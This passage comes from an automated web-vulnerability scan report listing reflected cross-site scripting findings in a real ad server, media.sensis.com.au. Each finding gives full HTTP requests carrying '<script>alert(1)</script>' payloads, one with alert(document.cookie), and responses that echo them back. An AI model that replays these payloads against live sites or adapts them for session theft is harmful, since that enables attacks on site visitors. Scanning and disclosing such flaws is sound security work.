P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a5822e95000000009009f"><script>alert(1)</script>bafec456006/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007" target="_new">
...[SNIP]...

2.695. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 732f4"><script>alert(1)</script>72a002a2ff1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random732f4"><script>alert(1)</script>72a002a2ff1=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:51 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 375
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a5822e9500000000/acc_random732f4"><script>alert(1)</script>72a002a2ff1=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007" target="_new">
...[SNIP]...

2.696. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f43e9"><script>alert(1)</script>0334e064762 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007?f43e9"><script>alert(1)</script>0334e064762=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:48 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 378
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a5822e9500000000/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007?f43e9"><script>alert(1)</script>0334e064762=1" target="_new">
...[SNIP]...

2.697. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d74f"><script>alert(1)</script>a3904bdf846 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver5d74f"><script>alert(1)</script>a3904bdf846/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:24 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc5d74f"><script>alert(1)</script>a3904bdf846/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pag
...[SNIP]...

2.698. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7e6"><script>alert(1)</script>2731e94d087 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random1e7e6"><script>alert(1)</script>2731e94d087=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:25 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random1e7e6"><script>alert(1)</script>2731e94d087=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=1469952
...[SNIP]...

2.699. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d8b0"><script>alert(1)</script>45856d743a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?4d8b0"><script>alert(1)</script>45856d743a=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:23 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 435
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?4d8b0"><script>alert(1)</script>45856d743a=1" target="_new">
...[SNIP]...

2.700. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19832"><script>alert(1)</script>7e4edb19c96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver19832"><script>alert(1)</script>7e4edb19c96/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:59 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 467
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c000000000000000019832"><script>alert(1)</script>7e4edb19c96/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244/relocate=http://clk.redcated/O
...[SNIP]...

2.701. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0fb2"><script>alert(1)</script>0cfb1204775 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomf0fb2"><script>alert(1)</script>0cfb1204775=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:13:00 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 467
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_randomf0fb2"><script>alert(1)</script>0cfb1204775=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244/relocate=http://clk.redcated/OMA/go/27018
...[SNIP]...

2.702. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8271d</script>c46d369eece was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244?8271d</script>c46d369eece=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:55 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2416
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="https://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.2;click=http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244?8271d</script>c46d369eece=1&relocate=;click=http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/A
...[SNIP]...

2.703. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb06"><script>alert(1)</script>c9d6aa1c2e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244?abb06"><script>alert(1)</script>c9d6aa1c2e2=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:50 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 696
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a960000000000000000/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244?abb06"><script>alert(1)</script>c9d6aa1c2e2=1&relocate=http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=2005956&PluID=0&ord=995441455010" target="_blank">
...[SNIP]...

2.704. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d50"><script>alert(1)</script>0efa3e551a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hservera4d50"><script>alert(1)</script>0efa3e551a1/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
